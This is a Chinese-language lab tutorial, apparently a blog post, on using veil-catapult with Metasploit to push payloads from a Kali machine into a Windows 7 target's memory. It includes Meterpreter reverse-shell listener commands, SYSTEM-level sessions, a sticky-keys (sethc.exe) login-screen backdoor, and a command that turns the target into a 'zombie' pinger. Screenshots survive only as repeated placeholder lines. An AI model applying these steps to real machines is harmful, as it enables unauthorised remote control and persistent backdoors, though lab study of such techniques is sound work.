veil-catapult进行payload投放,直接使payload在内存中执行。

kaliIP:192.168.1.119

目标IP:192.168.1.121

 

1、powershell

powershell工作原理:从kali先发一个powershell脚本到目标主机上,再发一个反弹shell到目标主机,再发一个指令给powershell,powershell通知反弹shell连接kali,之后就建立连接了

缺点:兼容性较差

veil-catapult 运行

veil-catapult

通常选1、2,如果使用标准的payload就选1,已经想使用自己的payload就选2。

这里选1

先生成powershell

veil-catapult

选1

在win7上是有powershell的运行环境的,直接在运行输入powershell

veil-catapult

veil-catapult

设置IP,目标用户名密码,执行形式

veil-catapult

回车

生成反弹shell的payload

veil-catapult

选1

设置反弹的IP,端口

veil-catapult

然后就生成好了,生成的payload并没有保存到本地,而是存在内存中,回车注入到目标主机的内存中,使目标主机反弹连接到kali

veil-catapult

但是kali并没有打开侦听,所以并没有连接成功,所以我们先打开msf的侦听

use exploit/multi/handler

veil-catapult

set payload windows/meterpreter/reverse_tcp

veil-catapult

 设置反弹的IP,和端口,以线程的注入方式

set lport 4444

set lhost 192.168.1.119

set EXITFUNC thread

veil-catapult

veil-catapult

show options

veil-catapult

exploit执行侦听

veil-catapult

msf执行侦听后,再对目标按照以上步骤进行payload投放

 

2、barehones python injector

通用性较好

打开msf进行侦听,veil-catapult运行,选1

veil-catapult

选择2,barehones python injector

veil-catapult

设置IP,目标用户名密码,执行形式

veil-catapult

生成反弹shell的payload,选1

veil-catapult

设置反弹的IP,端口

veil-catapult

然后就生成好了,生成的payload并没有保存到本地,而是存在内存中,回车注入到目标主机的内存中,使目标主机反弹连接到kali

veil-catapult

msf就侦听到了连接的信息,就可以看到session建立了

veil-catapult

查看这个session信息,这个session的id号是1

veil-catapult

进入到这个session

sessions -i 1

veil-catapult

查看ip地址

veil-catapult

就会看到ip是目标主机的ip

veil-catapult

查看uip,和pid,可以看到pid是2716

veil-catapult

在目标主机上打开任务管理器,可以看到2716的进程是python.exe,而且是system权限

veil-catapult

进入shell

veil-catapult

 

3、sethc backdoor

这次利用的是粘滞键的sethc.exe进程,连续点击5次shift键就会弹出粘滞键功能窗口,在登录页面这个功能依然有效,如下

veil-catapult

而veil-catapult的sethc backdoor功能是将sethc.exe进程替换成cmd.exe进程,注入之后连按5次shift键就会弹出cmd窗口

veil-catapult运行,选1

veil-catapult

选3

veil-catapult

设置IP,目标用户名密码,执行形式

 veil-catapult

回车

veil-catapult

回到目标主机的登录页面,连续按5次shift键弹出的就是cmd窗口了

veil-catapult

 由于是system权限,可以进行任何操作,甚至修改密码

 veil-catapult

 

4、execute custom command

veil-catapult运行,选1

veil-catapult

veil-catapult

设置IP,目标用户名密码,执行形式

veil-catapult

 让目标主机后台重复执行这条命令,不断地ping 192.168.1.119,可以用来当做僵尸攻击机

 

 

 

 

 

 

 

 

 

 

veil-catapult运行,选2的话是调用veil-evasion模块生成免杀payload

veil-catapult

 

相关文章:

  • 2022-12-23
  • 2021-12-30
  • 2021-12-26
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-01-16
  • 2021-11-18
猜你喜欢
  • 2022-12-23
  • 2021-05-30
  • 2021-11-06
  • 2021-11-29
  • 2021-10-11
  • 2021-12-05
  • 2022-12-23
相关资源
相似解决方案